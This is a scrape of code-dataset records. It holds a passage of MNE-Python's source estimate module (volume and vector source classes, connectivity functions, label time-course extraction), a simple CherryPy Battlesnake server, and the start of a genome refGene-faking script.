-------\n img : instance of Nifti1Image\n The image object.\n\n Notes\n -----\n .. 
versionadded:: 0.9.0\n \"\"\"\n from .morph import _interpolate_data\n data = self.magnitude() if self._data_ndim == 3 else self\n return _interpolate_data(data, src, mri_resolution=mri_resolution,\n mri_space=True, output=format)\n\n def get_peak(self, tmin=None, tmax=None, mode='abs',\n vert_as_index=False, time_as_index=False):\n \"\"\"Get location and latency of peak amplitude.\n\n Parameters\n ----------\n tmin : float | None\n The minimum point in time to be considered for peak getting.\n tmax : float | None\n The maximum point in time to be considered for peak getting.\n mode : {'pos', 'neg', 'abs'}\n How to deal with the sign of the data. If 'pos' only positive\n values will be considered. If 'neg' only negative values will\n be considered. If 'abs' absolute values will be considered.\n Defaults to 'abs'.\n vert_as_index : bool\n Whether to return the vertex index instead of of its ID.\n Defaults to False.\n time_as_index : bool\n Whether to return the time index instead of the latency.\n Defaults to False.\n\n Returns\n -------\n pos : int\n The vertex exhibiting the maximum response, either ID or index.\n latency : float\n The latency in seconds.\n \"\"\"\n stc = self.magnitude() if self._data_ndim == 3 else self\n vert_idx, time_idx, _ = _get_peak(stc.data, self.times, tmin, tmax,\n mode)\n\n return (vert_idx if vert_as_index else self.vertices[vert_idx],\n time_idx if time_as_index else self.times[time_idx])\n\n\n@fill_doc\nclass VolSourceEstimate(_BaseVolSourceEstimate):\n \"\"\"Container for volume source estimates.\n\n Parameters\n ----------\n data : array of shape (n_dipoles, n_times) | tuple, shape (2,)\n The data in source space. The data can either be a single array or\n a tuple with two arrays: \"kernel\" shape (n_vertices, n_sensors) and\n \"sens_data\" shape (n_sensors, n_times). 
In this case, the source\n space data corresponds to ``np.dot(kernel, sens_data)``.\n vertices : array of shape (n_dipoles,)\n The indices of the dipoles in the source space.\n tmin : scalar\n Time point of the first sample in data.\n tstep : scalar\n Time step between successive samples in data.\n subject : str | None\n The subject name. While not necessary, it is safer to set the\n subject parameter to avoid analysis errors.\n %(verbose)s\n\n Attributes\n ----------\n subject : str | None\n The subject name.\n times : array of shape (n_times,)\n The time vector.\n vertices : array of shape (n_dipoles,)\n The indices of the dipoles in the source space.\n data : array of shape (n_dipoles, n_times)\n The data in source space.\n shape : tuple\n The shape of the data. A tuple of int (n_dipoles, n_times).\n\n See Also\n --------\n SourceEstimate : A container for surface source estimates.\n VolVectorSourceEstimate : A container for volume vector source estimates.\n MixedSourceEstimate : A container for mixed surface + volume source\n estimates.\n\n Notes\n -----\n .. versionadded:: 0.9.0\n \"\"\"\n\n @verbose\n def save(self, fname, ftype='stc', verbose=None):\n \"\"\"Save the source estimates to a file.\n\n Parameters\n ----------\n fname : str\n The stem of the file name. The stem is extended with \"-vl.stc\"\n or \"-vl.w\".\n ftype : str\n File format to use. Allowed values are \"stc\" (default), \"w\",\n and \"h5\". 
The \"w\" format only supports a single time point.\n %(verbose_meth)s\n \"\"\"\n _validate_type(fname, 'path-like', 'fname')\n fname = str(fname)\n _check_option('ftype', ftype, ['stc', 'w', 'h5'])\n if ftype == 'stc':\n logger.info('Writing STC to disk...')\n if not (fname.endswith('-vl.stc') or fname.endswith('-vol.stc')):\n fname += '-vl.stc'\n _write_stc(fname, tmin=self.tmin, tstep=self.tstep,\n vertices=self.vertices, data=self.data)\n elif ftype == 'w':\n logger.info('Writing STC to disk (w format)...')\n if not (fname.endswith('-vl.w') or fname.endswith('-vol.w')):\n fname += '-vl.w'\n _write_w(fname, vertices=self.vertices, data=self.data)\n elif ftype == 'h5':\n super().save(fname, 'h5')\n logger.info('[done]')\n\n\n@fill_doc\nclass VolVectorSourceEstimate(_BaseVectorSourceEstimate,\n _BaseVolSourceEstimate):\n \"\"\"Container for volume source estimates.\n\n Parameters\n ----------\n data : array of shape (n_dipoles, 3, n_times)\n The data in source space. Each dipole contains three vectors that\n denote the dipole strength in X, Y and Z directions over time.\n vertices : array of shape (n_dipoles,)\n The indices of the dipoles in the source space.\n tmin : scalar\n Time point of the first sample in data.\n tstep : scalar\n Time step between successive samples in data.\n subject : str | None\n The subject name. While not necessary, it is safer to set the\n subject parameter to avoid analysis errors.\n %(verbose)s\n\n Attributes\n ----------\n subject : str | None\n The subject name.\n times : array of shape (n_times,)\n The time vector.\n vertices : array of shape (n_dipoles,)\n The indices of the dipoles in the source space.\n data : array of shape (n_dipoles, n_times)\n The data in source space.\n shape : tuple\n The shape of the data. 
A tuple of int (n_dipoles, n_times).\n\n See Also\n --------\n SourceEstimate : A container for surface source estimates.\n VectorSourceEstimate : A container for vector source estimates.\n MixedSourceEstimate : A container for mixed surface + volume source\n estimates.\n\n Notes\n -----\n .. versionadded:: 0.9.0\n \"\"\"\n\n _data_ndim = 3\n _scalar_class = VolSourceEstimate\n\n\n@fill_doc\nclass VectorSourceEstimate(_BaseVectorSourceEstimate,\n _BaseSurfaceSourceEstimate):\n \"\"\"Container for vector surface source estimates.\n\n For each vertex, the magnitude of the current is defined in the X, Y and Z\n directions.\n\n Parameters\n ----------\n data : array of shape (n_dipoles, 3, n_times)\n The data in source space. Each dipole contains three vectors that\n denote the dipole strength in X, Y and Z directions over time.\n vertices : list of array, shape (2,)\n Vertex numbers corresponding to the data. The first element of the list\n contains vertices of left hemisphere and the second element contains\n vertices of right hemisphere.\n tmin : float\n Time point of the first sample in data.\n tstep : float\n Time step between successive samples in data.\n subject : str | None\n The subject name. While not necessary, it is safer to set the\n subject parameter to avoid analysis errors.\n %(verbose)s\n\n Attributes\n ----------\n subject : str | None\n The subject name.\n times : array of shape (n_times,)\n The time vector.\n shape : tuple\n The shape of the data. A tuple of int (n_dipoles, n_times).\n\n See Also\n --------\n SourceEstimate : A container for surface source estimates.\n VolSourceEstimate : A container for volume source estimates.\n MixedSourceEstimate : A container for mixed surface + volume source\n estimates.\n\n Notes\n -----\n .. 
versionadded:: 0.15\n \"\"\"\n\n _data_ndim = 3\n _scalar_class = SourceEstimate\n\n @copy_function_doc_to_method_doc(plot_vector_source_estimates)\n def plot(self, subject=None, hemi='lh', colormap='hot', time_label='auto',\n smoothing_steps=10, transparent=True, brain_alpha=0.4,\n overlay_alpha=None, vector_alpha=1.0, scale_factor=None,\n time_viewer='auto', subjects_dir=None, figure=None, views='lat',\n colorbar=True, clim='auto', cortex='classic', size=800,\n background='black', foreground='white', initial_time=None,\n time_unit='s', show_traces='auto', verbose=None): # noqa: D102\n\n return plot_vector_source_estimates(\n self, subject=subject, hemi=hemi, colormap=colormap,\n time_label=time_label, smoothing_steps=smoothing_steps,\n transparent=transparent, brain_alpha=brain_alpha,\n overlay_alpha=overlay_alpha, vector_alpha=vector_alpha,\n scale_factor=scale_factor, time_viewer=time_viewer,\n subjects_dir=subjects_dir, figure=figure, views=views,\n colorbar=colorbar, clim=clim, cortex=cortex, size=size,\n background=background, foreground=foreground,\n initial_time=initial_time, time_unit=time_unit,\n show_traces=show_traces, verbose=verbose,\n )\n\n\n@fill_doc\nclass MixedSourceEstimate(_BaseSourceEstimate):\n \"\"\"Container for mixed surface and volume source estimates.\n\n Parameters\n ----------\n data : array of shape (n_dipoles, n_times) | tuple, shape (2,)\n The data in source space. The data can either be a single array or\n a tuple with two arrays: \"kernel\" shape (n_vertices, n_sensors) and\n \"sens_data\" shape (n_sensors, n_times). In this case, the source\n space data corresponds to ``np.dot(kernel, sens_data)``.\n vertices : list of array\n Vertex numbers corresponding to the data. The list contains arrays\n with one array per source space.\n tmin : scalar\n Time point of the first sample in data.\n tstep : scalar\n Time step between successive samples in data.\n subject : str | None\n The subject name. 
While not necessary, it is safer to set the\n subject parameter to avoid analysis errors.\n %(verbose)s\n\n Attributes\n ----------\n subject : str | None\n The subject name.\n times : array of shape (n_times,)\n The time vector.\n vertices : list of array\n Vertex numbers corresponding to the data. The list contains arrays\n with one array per source space.\n data : array of shape (n_dipoles, n_times)\n The data in source space.\n shape : tuple\n The shape of the data. A tuple of int (n_dipoles, n_times).\n\n See Also\n --------\n SourceEstimate : A container for surface source estimates.\n VectorSourceEstimate : A container for vector source estimates.\n VolSourceEstimate : A container for volume source estimates.\n VolVectorSourceEstimate : A container for Volume vector source estimates.\n\n Notes\n -----\n .. versionadded:: 0.9.0\n \"\"\"\n\n _data_ndim = 2\n _src_type = 'mixed'\n\n @verbose\n def __init__(self, data, vertices=None, tmin=None, tstep=None,\n subject=None, verbose=None): # noqa: D102\n if not isinstance(vertices, list) or len(vertices) < 2:\n raise ValueError('Vertices must be a list of numpy arrays with '\n 'one array per source space.')\n\n _BaseSourceEstimate.__init__(self, data, vertices=vertices, tmin=tmin,\n tstep=tstep, subject=subject,\n verbose=verbose)\n\n @fill_doc\n def plot_surface(self, src, subject=None, surface='inflated', hemi='lh',\n colormap='auto', time_label='time=%02.f ms',\n smoothing_steps=10,\n transparent=None, alpha=1.0, time_viewer='auto',\n subjects_dir=None, figure=None,\n views='lat', colorbar=True, clim='auto'):\n \"\"\"Plot surface source estimates with PySurfer.\n\n Note: PySurfer currently needs the SUBJECTS_DIR environment variable,\n which will automatically be set by this function. Plotting multiple\n SourceEstimates with different values for subjects_dir will cause\n PySurfer to use the wrong FreeSurfer surfaces when using methods of\n the returned Brain object. 
It is therefore recommended to set the\n SUBJECTS_DIR environment variable or always use the same value for\n subjects_dir (within the same Python session).\n\n Parameters\n ----------\n src : SourceSpaces\n The source spaces to plot.\n subject : str | None\n The subject name corresponding to FreeSurfer environment\n variable SUBJECT. If None stc.subject will be used. If that\n is None, the environment will be used.\n surface : str\n The type of surface (inflated, white etc.).\n hemi : str, 'lh' | 'rh' | 'split' | 'both'\n The hemisphere to display. Using 'both' or 'split' requires\n PySurfer version 0.4 or above.\n colormap : str | np.ndarray of float, shape(n_colors, 3 | 4)\n Name of colormap to use. See `plot_source_estimates`.\n time_label : str\n How to print info about the time instant visualized.\n smoothing_steps : int\n The amount of smoothing.\n transparent : bool | None\n If True, use a linear transparency between fmin and fmid.\n None will choose automatically based on colormap type.\n alpha : float\n Alpha value to apply globally to the overlay.\n time_viewer : bool\n Display time viewer GUI.\n %(subjects_dir)s\n figure : instance of mayavi.mlab.Figure | None\n If None, the last figure will be cleaned and a new figure will\n be created.\n views : str | list\n View to use. See `surfer.Brain`.\n colorbar : bool\n If True, display colorbar on scene.\n clim : str | dict\n Colorbar properties specification. 
See `plot_source_estimates`.\n\n Returns\n -------\n brain : instance of surfer.Brain\n A instance of `surfer.Brain` from PySurfer.\n \"\"\"\n # extract surface source spaces\n surf = _ensure_src(src, kind='surface')\n\n # extract surface source estimate\n data = self.data[:surf[0]['nuse'] + surf[1]['nuse']]\n vertices = [s['vertno'] for s in surf]\n\n stc = SourceEstimate(data, vertices, self.tmin, self.tstep,\n self.subject, self.verbose)\n\n return plot_source_estimates(stc, subject, surface=surface, hemi=hemi,\n colormap=colormap, time_label=time_label,\n smoothing_steps=smoothing_steps,\n transparent=transparent, alpha=alpha,\n time_viewer=time_viewer,\n subjects_dir=subjects_dir, figure=figure,\n views=views, colorbar=colorbar, clim=clim)\n\n\n###############################################################################\n# Morphing\n\n\ndef _get_vol_mask(src):\n \"\"\"Get the volume source space mask.\"\"\"\n assert len(src) == 1 # not a mixed source space\n shape = src[0]['shape'][::-1]\n mask = np.zeros(shape, bool)\n mask.flat[src[0]['vertno']] = True\n return mask\n\n\ndef _spatio_temporal_src_connectivity_vol(src, n_times):\n from sklearn.feature_extraction import grid_to_graph\n mask = _get_vol_mask(src)\n edges = grid_to_graph(*mask.shape, mask=mask)\n connectivity = _get_connectivity_from_edges(edges, n_times)\n return connectivity\n\n\ndef _spatio_temporal_src_connectivity_surf(src, n_times):\n if src[0]['use_tris'] is None:\n # XXX It would be nice to support non oct source spaces too...\n raise RuntimeError(\"The source space does not appear to be an ico \"\n \"surface. 
Connectivity cannot be extracted from\"\n \" non-ico source spaces.\")\n used_verts = [np.unique(s['use_tris']) for s in src]\n offs = np.cumsum([0] + [len(u_v) for u_v in used_verts])[:-1]\n tris = np.concatenate([np.searchsorted(u_v, s['use_tris']) + off\n for u_v, s, off in zip(used_verts, src, offs)])\n connectivity = spatio_temporal_tris_connectivity(tris, n_times)\n\n # deal with source space only using a subset of vertices\n masks = [np.in1d(u, s['vertno']) for s, u in zip(src, used_verts)]\n if sum(u.size for u in used_verts) != connectivity.shape[0] / n_times:\n raise ValueError('Used vertices do not match connectivity shape')\n if [np.sum(m) for m in masks] != [len(s['vertno']) for s in src]:\n raise ValueError('Vertex mask does not match number of vertices')\n masks = np.concatenate(masks)\n missing = 100 * float(len(masks) - np.sum(masks)) / len(masks)\n if missing:\n warn_('%0.1f%% of original source space vertices have been'\n ' omitted, tri-based connectivity will have holes.\\n'\n 'Consider using distance-based connectivity or '\n 'morphing data to all source space vertices.' % missing)\n masks = np.tile(masks, n_times)\n masks = np.where(masks)[0]\n connectivity = connectivity.tocsr()\n connectivity = connectivity[masks]\n connectivity = connectivity[:, masks]\n # return to original format\n connectivity = connectivity.tocoo()\n return connectivity\n\n\n@verbose\ndef spatio_temporal_src_connectivity(src, n_times, dist=None, verbose=None):\n \"\"\"Compute connectivity for a source space activation over time.\n\n Parameters\n ----------\n src : instance of SourceSpaces\n The source space. It can be a surface source space or a\n volume source space.\n n_times : int\n Number of time instants.\n dist : float, or None\n Maximal geodesic distance (in m) between vertices in the\n source space to consider neighbors. 
If None, immediate neighbors\n are extracted from an ico surface.\n %(verbose)s\n\n Returns\n -------\n connectivity : ~scipy.sparse.coo_matrix\n The connectivity matrix describing the spatio-temporal\n graph structure. If N is the number of vertices in the\n source space, the N first nodes in the graph are the\n vertices are time 1, the nodes from 2 to 2N are the vertices\n during time 2, etc.\n \"\"\"\n # XXX we should compute connectivity for each source space and then\n # use scipy.sparse.block_diag to concatenate them\n if src[0]['type'] == 'vol':\n if dist is not None:\n raise ValueError('dist must be None for a volume '\n 'source space. Got %s.' % dist)\n\n connectivity = _spatio_temporal_src_connectivity_vol(src, n_times)\n elif dist is not None:\n # use distances computed and saved in the source space file\n connectivity = spatio_temporal_dist_connectivity(src, n_times, dist)\n else:\n connectivity = _spatio_temporal_src_connectivity_surf(src, n_times)\n return connectivity\n\n\n@verbose\ndef grade_to_tris(grade, verbose=None):\n \"\"\"Get tris defined for a certain grade.\n\n Parameters\n ----------\n grade : int\n Grade of an icosahedral mesh.\n %(verbose)s\n\n Returns\n -------\n tris : list\n 2-element list containing Nx3 arrays of tris, suitable for use in\n spatio_temporal_tris_connectivity.\n \"\"\"\n a = _get_ico_tris(grade, None, False)\n tris = np.concatenate((a, a + (np.max(a) + 1)))\n return tris\n\n\n@verbose\ndef spatio_temporal_tris_connectivity(tris, n_times, remap_vertices=False,\n verbose=None):\n \"\"\"Compute connectivity from triangles and time instants.\n\n Parameters\n ----------\n tris : array\n N x 3 array defining triangles.\n n_times : int\n Number of time points.\n remap_vertices : bool\n Reassign vertex indices based on unique values. Useful\n to process a subset of triangles. 
Defaults to False.\n %(verbose)s\n\n Returns\n -------\n connectivity : ~scipy.sparse.coo_matrix\n The connectivity matrix describing the spatio-temporal\n graph structure. If N is the number of vertices in the\n source space, the N first nodes in the graph are the\n vertices are time 1, the nodes from 2 to 2N are the vertices\n during time 2, etc.\n \"\"\"\n if remap_vertices:\n logger.info('Reassigning vertex indices.')\n tris = np.searchsorted(np.unique(tris), tris)\n\n edges = mesh_edges(tris).tocoo()\n return _get_connectivity_from_edges(edges, n_times)\n\n\n@verbose\ndef spatio_temporal_dist_connectivity(src, n_times, dist, verbose=None):\n \"\"\"Compute connectivity from distances in a source space and time instants.\n\n Parameters\n ----------\n src : instance of SourceSpaces\n The source space must have distances between vertices computed, such\n that src['dist'] exists and is useful. This can be obtained\n with a call to :func:`mne.setup_source_space` with the\n ``add_dist=True`` option.\n n_times : int\n Number of time points.\n dist : float\n Maximal geodesic distance (in m) between vertices in the\n source space to consider neighbors.\n %(verbose)s\n\n Returns\n -------\n connectivity : ~scipy.sparse.coo_matrix\n The connectivity matrix describing the spatio-temporal\n graph structure. 
If N is the number of vertices in the\n source space, the N first nodes in the graph are the\n vertices are time 1, the nodes from 2 to 2N are the vertices\n during time 2, etc.\n \"\"\"\n if src[0]['dist'] is None:\n raise RuntimeError('src must have distances included, consider using '\n 'setup_source_space with add_dist=True')\n edges = sparse_block_diag([s['dist'][s['vertno'], :][:, s['vertno']]\n for s in src])\n edges.data[:] = np.less_equal(edges.data, dist)\n # clean it up and put it in coo format\n edges = edges.tocsr()\n edges.eliminate_zeros()\n edges = edges.tocoo()\n return _get_connectivity_from_edges(edges, n_times)\n\n\n@verbose\ndef spatial_src_connectivity(src, dist=None, verbose=None):\n \"\"\"Compute connectivity for a source space activation.\n\n Parameters\n ----------\n src : instance of SourceSpaces\n The source space. It can be a surface source space or a\n volume source space.\n dist : float, or None\n Maximal geodesic distance (in m) between vertices in the\n source space to consider neighbors. If None, immediate neighbors\n are extracted from an ico surface.\n %(verbose)s\n\n Returns\n -------\n connectivity : ~scipy.sparse.coo_matrix\n The connectivity matrix describing the spatial graph structure.\n \"\"\"\n return spatio_temporal_src_connectivity(src, 1, dist)\n\n\n@verbose\ndef spatial_tris_connectivity(tris, remap_vertices=False, verbose=None):\n \"\"\"Compute connectivity from triangles.\n\n Parameters\n ----------\n tris : array\n N x 3 array defining triangles.\n remap_vertices : bool\n Reassign vertex indices based on unique values. Useful\n to process a subset of triangles. 
Defaults to False.\n %(verbose)s\n\n Returns\n -------\n connectivity : ~scipy.sparse.coo_matrix\n The connectivity matrix describing the spatial graph structure.\n \"\"\"\n return spatio_temporal_tris_connectivity(tris, 1, remap_vertices)\n\n\n@verbose\ndef spatial_dist_connectivity(src, dist, verbose=None):\n \"\"\"Compute connectivity from distances in a source space.\n\n Parameters\n ----------\n src : instance of SourceSpaces\n The source space must have distances between vertices computed, such\n that src['dist'] exists and is useful. This can be obtained\n with a call to :func:`mne.setup_source_space` with the\n ``add_dist=True`` option.\n dist : float\n Maximal geodesic distance (in m) between vertices in the\n source space to consider neighbors.\n %(verbose)s\n\n Returns\n -------\n connectivity : ~scipy.sparse.coo_matrix\n The connectivity matrix describing the spatial graph structure.\n \"\"\"\n return spatio_temporal_dist_connectivity(src, 1, dist)\n\n\n@verbose\ndef spatial_inter_hemi_connectivity(src, dist, verbose=None):\n \"\"\"Get vertices on each hemisphere that are close to the other hemisphere.\n\n Parameters\n ----------\n src : instance of SourceSpaces\n The source space. Must be surface type.\n dist : float\n Maximal Euclidean distance (in m) between vertices in one hemisphere\n compared to the other to consider neighbors.\n %(verbose)s\n\n Returns\n -------\n connectivity : ~scipy.sparse.coo_matrix\n The connectivity matrix describing the spatial graph structure.\n Typically this should be combined (addititively) with another\n existing intra-hemispheric connectivity matrix, e.g. 
computed\n using geodesic distances.\n \"\"\"\n from scipy.spatial.distance import cdist\n src = _ensure_src(src, kind='surface')\n conn = cdist(src[0]['rr'][src[0]['vertno']],\n src[1]['rr'][src[1]['vertno']])\n conn = sparse.csr_matrix(conn <= dist, dtype=int)\n empties = [sparse.csr_matrix((nv, nv), dtype=int) for nv in conn.shape]\n conn = sparse.vstack([sparse.hstack([empties[0], conn]),\n sparse.hstack([conn.T, empties[1]])])\n return conn\n\n\n@verbose\ndef _get_connectivity_from_edges(edges, n_times, verbose=None):\n \"\"\"Given edges sparse matrix, create connectivity matrix.\"\"\"\n n_vertices = edges.shape[0]\n logger.info(\"-- number of connected vertices : %d\" % n_vertices)\n nnz = edges.col.size\n aux = n_vertices * np.arange(n_times)[:, None] * np.ones((1, nnz), np.int)\n col = (edges.col[None, :] + aux).ravel()\n row = (edges.row[None, :] + aux).ravel()\n if n_times > 1: # add temporal edges\n o = (n_vertices * np.arange(n_times - 1)[:, None] +\n np.arange(n_vertices)[None, :]).ravel()\n d = (n_vertices * np.arange(1, n_times)[:, None] +\n np.arange(n_vertices)[None, :]).ravel()\n row = np.concatenate((row, o, d))\n col = np.concatenate((col, d, o))\n data = np.ones(edges.data.size * n_times + 2 * n_vertices * (n_times - 1),\n dtype=np.int)\n connectivity = coo_matrix((data, (row, col)),\n shape=(n_times * n_vertices,) * 2)\n return connectivity\n\n\n@verbose\ndef _get_ico_tris(grade, verbose=None, return_surf=False):\n \"\"\"Get triangles for ico surface.\"\"\"\n ico = _get_ico_surface(grade)\n if not return_surf:\n return ico['tris']\n else:\n return ico\n\n\ndef _pca_flip(flip, data):\n U, s, V = linalg.svd(data, full_matrices=False)\n # determine sign-flip\n sign = np.sign(np.dot(U[:, 0], flip))\n # use average power in label for scaling\n scale = linalg.norm(s) / np.sqrt(len(data))\n return sign * scale * V[0]\n\n\n_label_funcs = {\n 'mean': lambda flip, data: np.mean(data, axis=0),\n 'mean_flip': lambda flip, data: np.mean(flip * data, 
axis=0),\n 'max': lambda flip, data: np.max(np.abs(data), axis=0),\n 'pca_flip': _pca_flip,\n}\n\n\n@contextlib.contextmanager\ndef _temporary_vertices(src, vertices):\n orig_vertices = [s['vertno'] for s in src]\n for s, v in zip(src, vertices):\n s['vertno'] = v\n try:\n yield\n finally:\n for s, v in zip(src, orig_vertices):\n s['vertno'] = v\n\n\ndef _prepare_label_extraction(stc, labels, src, mode, allow_empty):\n \"\"\"Prepare indices and flips for extract_label_time_course.\"\"\"\n # if src is a mixed src space, the first 2 src spaces are surf type and\n # the other ones are vol type. For mixed source space n_labels will be the\n # given by the number of ROIs of the cortical parcellation plus the number\n # of vol src space\n from .label import label_sign_flip\n\n # get vertices from source space, they have to be the same as in the stcs\n vertno = stc.vertices\n nvert = [len(vn) for vn in vertno]\n\n # do the initialization\n label_vertidx = list()\n label_flip = list()\n for s, v, hemi in zip(src, stc.vertices, ('left', 'right')):\n n_missing = (~np.in1d(v, s['vertno'])).sum()\n if n_missing:\n raise ValueError('%d/%d %s hemisphere stc vertices missing from '\n 'the source space, likely mismatch'\n % (n_missing, len(v), hemi))\n for label in labels:\n if label.hemi == 'both':\n # handle BiHemiLabel\n sub_labels = [label.lh, label.rh]\n else:\n sub_labels = [label]\n this_vertidx = list()\n for slabel in sub_labels:\n if slabel.hemi == 'lh':\n this_vertices = np.intersect1d(vertno[0], slabel.vertices)\n vertidx = np.searchsorted(vertno[0], this_vertices)\n elif slabel.hemi == 'rh':\n this_vertices = np.intersect1d(vertno[1], slabel.vertices)\n vertidx = nvert[0] + np.searchsorted(vertno[1], this_vertices)\n else:\n raise ValueError('label %s has invalid hemi' % label.name)\n this_vertidx.append(vertidx)\n\n # convert it to an array\n this_vertidx = np.concatenate(this_vertidx)\n this_flip = None\n if len(this_vertidx) == 0:\n msg = ('source space does not 
contain any vertices for label %s'\n % label.name)\n if not allow_empty:\n raise ValueError(msg)\n else:\n warn_(msg + '. Assigning all-zero time series to label.')\n this_vertidx = None # to later check if label is empty\n elif mode not in ('mean', 'max'): # mode-dependent initialization\n # label_sign_flip uses two properties:\n #\n # - src[ii]['nn']\n # - src[ii]['vertno']\n #\n # So if we override vertno with the stc vertices, it will pick\n # the correct normals.\n with _temporary_vertices(src, stc.vertices):\n this_flip = label_sign_flip(label, src[:2])[:, None]\n\n label_vertidx.append(this_vertidx)\n label_flip.append(this_flip)\n\n return label_vertidx, label_flip\n\n\ndef _gen_extract_label_time_course(stcs, labels, src, mode='mean',\n allow_empty=False, verbose=None):\n # loop through source estimates and extract time series\n _check_option('mode', mode, sorted(_label_funcs.keys()))\n func = _label_funcs[mode]\n if len(src) > 2:\n if src[0]['type'] != 'surf' or src[1]['type'] != 'surf':\n raise ValueError('The first 2 source spaces have to be surf type')\n if any(np.any(s['type'] != 'vol') for s in src[2:]):\n raise ValueError('source spaces have to be of vol type')\n\n n_aparc = len(labels)\n n_aseg = len(src[2:])\n n_labels = n_aparc + n_aseg\n else:\n n_labels = len(labels)\n vertno = None\n for stc in stcs:\n if vertno is None:\n vertno = copy.deepcopy(stc.vertices)\n nvert = [len(v) for v in vertno]\n label_vertidx, src_flip = _prepare_label_extraction(\n stc, labels, src, mode, allow_empty)\n # make sure the stc is compatible with the source space\n for i in range(len(vertno)):\n if len(stc.vertices[i]) != nvert[i]:\n raise ValueError('stc not compatible with source space. 
'\n 'stc has %s time series but there are %s '\n 'vertices in source space'\n % (len(stc.vertices[i]), nvert[i]))\n\n if any(np.any(svn != vn) for svn, vn in zip(stc.vertices, vertno)):\n raise ValueError('stc not compatible with source space')\n if sum(nvert) != stc.shape[0]:\n raise ValueError('stc not compatible with source space. '\n 'stc has %s vertices but the source space '\n 'has %s vertices'\n % (stc.shape[0], sum(nvert)))\n\n logger.info('Extracting time courses for %d labels (mode: %s)'\n % (n_labels, mode))\n\n # do the extraction\n label_tc = np.zeros((n_labels, stc.data.shape[1]),\n dtype=stc.data.dtype)\n for i, (vertidx, flip) in enumerate(zip(label_vertidx, src_flip)):\n if vertidx is not None:\n label_tc[i] = func(flip, stc.data[vertidx, :])\n\n # extract label time series for the vol src space\n if len(src) > 2:\n v1 = nvert[0] + nvert[1]\n for i, nv in enumerate(nvert[2:]):\n\n v2 = v1 + nv\n v = range(v1, v2)\n if nv != 0:\n label_tc[n_aparc + i] = np.mean(stc.data[v, :], axis=0)\n\n v1 = v2\n\n # this is a generator!\n yield label_tc\n\n\n@verbose\ndef extract_label_time_course(stcs, labels, src, mode='mean_flip',\n allow_empty=False, return_generator=False,\n verbose=None):\n \"\"\"Extract label time course for lists of labels and source estimates.\n\n This function will extract one time course for each label and source\n estimate. 
The way the time courses are extracted depends on the mode\n parameter (see Notes).\n\n Parameters\n ----------\n stcs : SourceEstimate | list (or generator) of SourceEstimate\n The source estimates from which to extract the time course.\n %(eltc_labels)s\n %(eltc_src)s\n %(eltc_mode)s\n %(eltc_allow_empty)s\n return_generator : bool\n If True, a generator instead of a list is returned.\n %(verbose)s\n\n Returns\n -------\n label_tc : array | list (or generator) of array, shape (n_labels, n_times)\n Extracted time course for each label and source estimate.\n\n Notes\n -----\n %(eltc_mode_notes)s\n\n If encountering a ``ValueError`` due to mismatch between number of\n source points in the subject source space and computed ``stc`` object set\n ``src`` argument to ``fwd['src']`` to ensure the source space is\n compatible between forward and inverse routines.\n \"\"\"\n # convert inputs to lists\n if isinstance(stcs, SourceEstimate):\n stcs = [stcs]\n return_several = False\n return_generator = False\n else:\n return_several = True\n\n if not isinstance(labels, list):\n labels = [labels]\n\n label_tc = _gen_extract_label_time_course(stcs, labels, src, mode=mode,\n allow_empty=allow_empty)\n\n if not return_generator:\n # do the extraction and return a list\n label_tc = list(label_tc)\n\n if not return_several:\n # input was a single SoureEstimate, return single array\n label_tc = label_tc[0]\n\n return label_tc\n","repo_name":"soheilbr82/BluegrassWorkingMemory","sub_path":"Python_Engine/Lib/site-packages/mne/source_estimate.py","file_name":"source_estimate.py","file_ext":"py","file_size_in_byte":106955,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"18"} +{"seq_id":"17790686492","text":"import os\nimport random\n\nimport cherrypy\n\n\"\"\"\nThis is a simple Battlesnake server written in Python.\nFor instructions see https://github.com/BattlesnakeOfficial/starter-snake-python/README.md\n\"\"\"\n\nclass 
Battlesnake(object):\n\t@cherrypy.expose\n\t@cherrypy.tools.json_out()\n\tdef index(self):\n\t\treturn {\n\t\t\t\"apiversion\": \"1\",\n\t\t\t\"author\": \"sinek\",\n\t\t\t\"color\": \"#888888\",\n\t\t\t\"head\": \"default\",\n\t\t\t\"tail\": \"default\",\n\t\t}\n\n\t@cherrypy.expose\n\t@cherrypy.tools.json_in()\n\tdef start(self):\n\t\tdata = cherrypy.request.json\n\n\t\tprint(\"START\")\n\t\treturn \"ok\"\n\n\t@cherrypy.expose\n\t@cherrypy.tools.json_in()\n\t@cherrypy.tools.json_out()\n\tdef move(self):\n\t\tdata = cherrypy.request.json\n\n\t\tprint(data)\n\n\t\t# Choose a random direction to move in\n\t\tpossible_moves = [\"up\", \"down\", \"left\", \"right\"]\n\t\tmove = random.choice(possible_moves)\n\n\t\tprint(f\"MOVE: {move}\")\n\t\treturn {\"move\": move}\n\n\t@cherrypy.expose\n\t@cherrypy.tools.json_in()\n\tdef end(self):\n\t\tdata = cherrypy.request.json\n\n\t\tprint(\"END\")\n\t\treturn \"ok\"\n\n\nif __name__ == \"__main__\":\n server = Battlesnake()\n cherrypy.config.update({\"server.socket_host\": \"0.0.0.0\"})\n cherrypy.config.update(\n {\"server.socket_port\": int(os.environ.get(\"PORT\", \"8080\")),}\n )\n print(\"Starting Battlesnake Server...\")\n cherrypy.quickstart(server)\n","repo_name":"isinek/battle-snake-python","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"19820197508","text":"\"\"\"Produces a fake refGene file for an artificial genome.\"\"\"\r\n\r\nimport re\r\n\r\nimport consts\r\nimport common\r\nfrom utils.datasets import DATASETS\r\n\r\n# Identifies a target sequence.\r\nTARGET_PATTERN = '([ACGT]{%d})[N]{%d}'\r\n# A template for an entry in a refGene file.\r\nREFGENE_LINE = (\r\n \"{idx}\\t{gene_name1}\\t{chr_name}\\t{strand}\\t\"\r\n \"{start}\\t{end}\\t{start}\\t{end}\\t1\\t{start},\\t{end},\\t\"\r\n \"0\\t{gene_name2}\\tcmpl\\tcmpl\\t0\\n\"\r\n)\r\n# Templates for gene 
